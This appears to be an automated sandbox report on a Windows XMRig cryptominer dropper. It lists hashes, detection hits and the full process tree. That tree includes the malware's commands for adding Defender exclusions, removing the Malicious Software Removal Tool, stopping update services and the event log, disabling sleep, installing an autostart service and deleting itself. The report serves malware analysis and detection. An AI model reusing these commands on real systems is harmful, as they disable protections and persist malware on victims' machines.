Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-11-2024 02:08
Static task
static1
Behavioral task
behavioral1
Sample
b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe
Resource
win7-20240903-en
General
-
Target
b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe
-
Size
5.6MB
-
MD5
4d2fd9b3ddadb332c994815e57fa2dbe
-
SHA1
c089f6ebf51c6bc8b39defcc824eab69ba039332
-
SHA256
b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867
-
SHA512
4775e037c4a55265f9580cf9fc4cef1f48e8d38be41c869277ee1ba89ae385847e2f7363c7ff2255294ee03d5938c81ee75da96d93bfb3be2a842154d0e6f988
-
SSDEEP
98304:KggSZTFznDHwE8oohoIgNgx+r3P4jw4fn9E32RW0O2gT/gQGhP3oFL6p4kvDZ/H3:DgSZJznDHMo+JgNgx+r3P+e32BO2gjgT
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 11 IoCs
Processes:
resource yara_rule behavioral2/memory/3756-62-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3756-61-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3756-64-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3756-65-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3756-68-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3756-66-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3756-67-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3756-70-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3756-71-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3756-73-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3756-72-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepid Process 4540 powershell.exe 2600 powershell.exe -
Creates new service(s) 2 TTPs
-
Executes dropped EXE 1 IoCs
Processes:
fqwofdtexigy.exepid Process 3808 fqwofdtexigy.exe -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepid Process 4700 powercfg.exe 1620 powercfg.exe 2804 powercfg.exe 3144 powercfg.exe 3684 powercfg.exe 4524 powercfg.exe 5016 powercfg.exe 4788 powercfg.exe -
Drops file in System32 directory 4 IoCs
Processes:
b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exepowershell.exefqwofdtexigy.exedescription ioc Process File opened for modification C:\Windows\system32\MRT.exe b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe fqwofdtexigy.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
fqwofdtexigy.exedescription pid Process procid_target PID 3808 set thread context of 2372 3808 fqwofdtexigy.exe 153 PID 3808 set thread context of 3756 3808 fqwofdtexigy.exe 158 -
Processes:
resource yara_rule behavioral2/memory/3756-62-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3756-61-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3756-60-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3756-59-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3756-58-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3756-57-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3756-56-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3756-64-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3756-65-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3756-68-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3756-66-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3756-67-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3756-70-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3756-71-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3756-73-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3756-72-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid Process 1772 sc.exe 2932 sc.exe 3392 sc.exe 3600 sc.exe 4712 sc.exe 3812 sc.exe 5040 sc.exe 4488 sc.exe 4860 sc.exe 4480 sc.exe 4440 sc.exe 5088 sc.exe 5100 sc.exe 4692 sc.exe -
Modifies data under HKEY_USERS 46 IoCs
Processes:
powershell.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exepowershell.exefqwofdtexigy.exepowershell.exenslookup.exepid Process 1208 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 4540 powershell.exe 4540 powershell.exe 1208 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 1208 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 1208 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 1208 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 1208 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 1208 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 1208 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 1208 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 1208 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 1208 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 1208 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 1208 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 1208 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 1208 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 1208 b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe 3808 fqwofdtexigy.exe 2600 powershell.exe 2600 powershell.exe 3808 fqwofdtexigy.exe 3808 fqwofdtexigy.exe 3808 fqwofdtexigy.exe 3808 fqwofdtexigy.exe 3808 fqwofdtexigy.exe 3808 fqwofdtexigy.exe 3808 fqwofdtexigy.exe 3808 fqwofdtexigy.exe 3808 fqwofdtexigy.exe 3808 fqwofdtexigy.exe 3808 fqwofdtexigy.exe 3808 fqwofdtexigy.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe 3756 nslookup.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exenslookup.exedescription pid Process Token: SeDebugPrivilege 4540 powershell.exe Token: SeShutdownPrivilege 4788 powercfg.exe Token: SeCreatePagefilePrivilege 4788 powercfg.exe Token: SeShutdownPrivilege 5016 powercfg.exe Token: SeCreatePagefilePrivilege 5016 powercfg.exe Token: SeShutdownPrivilege 4524 powercfg.exe Token: SeCreatePagefilePrivilege 4524 powercfg.exe Token: SeShutdownPrivilege 3684 powercfg.exe Token: SeCreatePagefilePrivilege 3684 powercfg.exe Token: SeDebugPrivilege 2600 powershell.exe Token: SeShutdownPrivilege 3144 powercfg.exe Token: SeCreatePagefilePrivilege 3144 powercfg.exe Token: SeShutdownPrivilege 2804 powercfg.exe Token: SeCreatePagefilePrivilege 2804 powercfg.exe Token: SeShutdownPrivilege 4700 powercfg.exe Token: SeCreatePagefilePrivilege 4700 powercfg.exe Token: SeShutdownPrivilege 1620 powercfg.exe Token: SeCreatePagefilePrivilege 1620 powercfg.exe Token: SeLockMemoryPrivilege 3756 nslookup.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
cmd.execmd.execmd.exefqwofdtexigy.exedescription pid Process procid_target PID 1444 wrote to memory of 4620 1444 cmd.exe 105 PID 1444 wrote to memory of 4620 1444 cmd.exe 105 PID 5108 wrote to memory of 3172 5108 cmd.exe 133 PID 5108 wrote to memory of 3172 5108 cmd.exe 133 PID 4316 wrote to memory of 2848 4316 cmd.exe 142 PID 4316 wrote to memory of 2848 4316 cmd.exe 142 PID 3808 wrote to memory of 2372 3808 fqwofdtexigy.exe 153 PID 3808 wrote to memory of 2372 3808 fqwofdtexigy.exe 153 PID 3808 wrote to memory of 2372 3808 fqwofdtexigy.exe 153 PID 3808 wrote to memory of 2372 3808 fqwofdtexigy.exe 153 PID 3808 wrote to memory of 2372 3808 fqwofdtexigy.exe 153 PID 3808 wrote to memory of 2372 3808 fqwofdtexigy.exe 153 PID 3808 wrote to memory of 2372 3808 fqwofdtexigy.exe 153 PID 3808 wrote to memory of 2372 3808 fqwofdtexigy.exe 153 PID 3808 wrote to memory of 2372 3808 fqwofdtexigy.exe 153 PID 3808 wrote to memory of 3756 3808 fqwofdtexigy.exe 158 PID 3808 wrote to memory of 3756 3808 fqwofdtexigy.exe 158 PID 3808 wrote to memory of 3756 3808 fqwofdtexigy.exe 158 PID 3808 wrote to memory of 3756 3808 fqwofdtexigy.exe 158 PID 3808 wrote to memory of 3756 3808 fqwofdtexigy.exe 158
Processes
-
C:\Users\Admin\AppData\Local\Temp\b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe"C:\Users\Admin\AppData\Local\Temp\b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1208 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4540
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:4620
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:4440
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:5088
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:3812
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:5040
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:1772
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3684
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4788
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5016
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4524
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "JVNIRHNX"2⤵
- Launches sc.exe
PID:4488
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "JVNIRHNX" binpath= "C:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exe" start= "auto"2⤵
- Launches sc.exe
PID:3600
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog2⤵
- Launches sc.exe
PID:4712
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "JVNIRHNX"2⤵
- Launches sc.exe
PID:2932
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:5108 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:3172
-
-
-
C:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exeC:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3808 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2600
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:4316 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:2848
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:4860
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:5100
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:4692
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:3392
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:4480
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4700
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3144
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:2372
-
-
C:\Windows\system32\nslookup.exenslookup.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3756
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.6MB
MD54d2fd9b3ddadb332c994815e57fa2dbe
SHA1c089f6ebf51c6bc8b39defcc824eab69ba039332
SHA256b543e679d6f69b159f8ca85efc39a110fa44c1c10c8850dce8170b655f071867
SHA5124775e037c4a55265f9580cf9fc4cef1f48e8d38be41c869277ee1ba89ae385847e2f7363c7ff2255294ee03d5938c81ee75da96d93bfb3be2a842154d0e6f988
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82